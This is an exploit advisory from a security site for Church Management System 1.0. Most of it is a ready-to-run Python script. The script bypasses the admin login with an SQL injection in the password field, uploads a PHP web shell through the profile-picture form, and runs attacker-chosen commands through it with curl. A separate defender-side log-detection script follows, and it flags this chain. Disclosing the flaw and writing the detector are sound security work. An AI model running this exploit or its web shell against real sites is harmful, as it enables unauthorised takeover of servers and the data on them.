Church Management System 1.0 Shell Upload / SQL Injection

2021.07.09
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
# Date: 05-07-2021
# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu)

import os
import sys
import random
import string
import optparse

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

if len(sys.argv) != 5:
    print('Usage: -u http://<ip> -c <"command">')
    print(f'ex. python3 {sys.argv[0]} -u http://192.168.1.2 -c "ls+-la"')
    exit()

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url")
parser.add_option('-c', '--cmd', action="store", dest="cmd")
options, args = parser.parse_args()
print(options.url, options.cmd)


def randomGen(size=8, chars=string.ascii_lowercase):
    # Random name for the uploaded file so it does not collide with existing uploads
    return ''.join(random.choice(chars) for _ in range(size))


urlbase = options.url + '/cman/admin'
loginUrl = urlbase + '/index.php'
shellFile = randomGen() + ".php"

# SQL injection in the password field bypasses the admin login
payload = {"username": "test", "password": "' or 'a'='a'#", "login": ""}

# Optional intercepting proxy; uncomment the proxies= arguments below to use it
proxies = {"http": "http://localhost:8080"}

# The profile-picture upload (admin_pic.php) does not validate the file type,
# so a .php file ends up in the web-accessible uploads/ directory
mp_encoder = MultipartEncoder(fields={
    "image": (shellFile, "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>", "application/x-php"),
    "change": ""
})

session = requests.Session()
r = session.post(loginUrl, payload, allow_redirects=False)  # , proxies=proxies)
cookie = r.headers["Set-Cookie"]
headers = {"Cookie": cookie, 'Content-Type': mp_encoder.content_type}

uploadUrl = urlbase + "/admin_pic.php"
post = session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers)  # , proxies=proxies)

os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd=" + options.cmd)
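A defender-side detection check for the three-stage chain this advisory describes (login bypass, picture upload, script served from uploads/), added here as an example and not part of the original advisory. It runs over constructed Apache combined-log lines; the paths (/cman/admin/index.php, /cman/admin/admin_pic.php, uploads/) come from the exploit above, the sample IPs and filenames are made up.

```python
import re
from collections import defaultdict

# Constructed sample Apache combined-log lines; not from the original advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jul/2021:10:00:01 +0000] "POST /cman/admin/index.php HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
10.0.0.5 - - [09/Jul/2021:10:00:02 +0000] "POST /cman/admin/admin_pic.php HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
10.0.0.5 - - [09/Jul/2021:10:00:03 +0000] "GET /cman/admin/uploads/qwertyui.php?cmd=ls+-la HTTP/1.1" 200 512 "-" "curl/7.58.0"
10.0.0.9 - - [09/Jul/2021:10:05:00 +0000] "GET /cman/admin/uploads/avatar.jpg HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jul/2021:10:05:01 +0000] "POST /cman/admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return (ip, severity, reason) findings for the advisory's attack chain."""
    findings = []
    stages = defaultdict(set)  # source IP -> stages of the chain observed
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        url, _, query = rec["path"].partition("?")
        if rec["method"] == "POST" and url.endswith("/cman/admin/index.php"):
            stages[ip].add("login")
        elif rec["method"] == "POST" and url.endswith("/cman/admin/admin_pic.php"):
            stages[ip].add("upload")
        elif "/uploads/" in url and url.lower().endswith(".php"):
            # A script served out of the picture-upload directory is the RCE
            # stage on its own; a cmd= parameter makes it near-certain.
            sev = "critical" if "cmd=" in query else "high"
            findings.append((ip, sev, "PHP executed from uploads/: " + rec["path"]))
            stages[ip].add("shell")
    for ip, seen in stages.items():
        if seen >= {"login", "upload", "shell"}:
            findings.append((ip, "critical", "full login->upload->shell chain observed"))
    return findings


if __name__ == "__main__":
    for ip, sev, reason in detect(SAMPLE_LOG):
        print(f"[{sev}] {ip}: {reason}")
```

The same rule set ports directly to a SIEM query: alert on any `.php` request under the application's uploads directory, and raise severity when the same source also posted to admin_pic.php shortly before.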


Copyright 2021, cxsecurity.com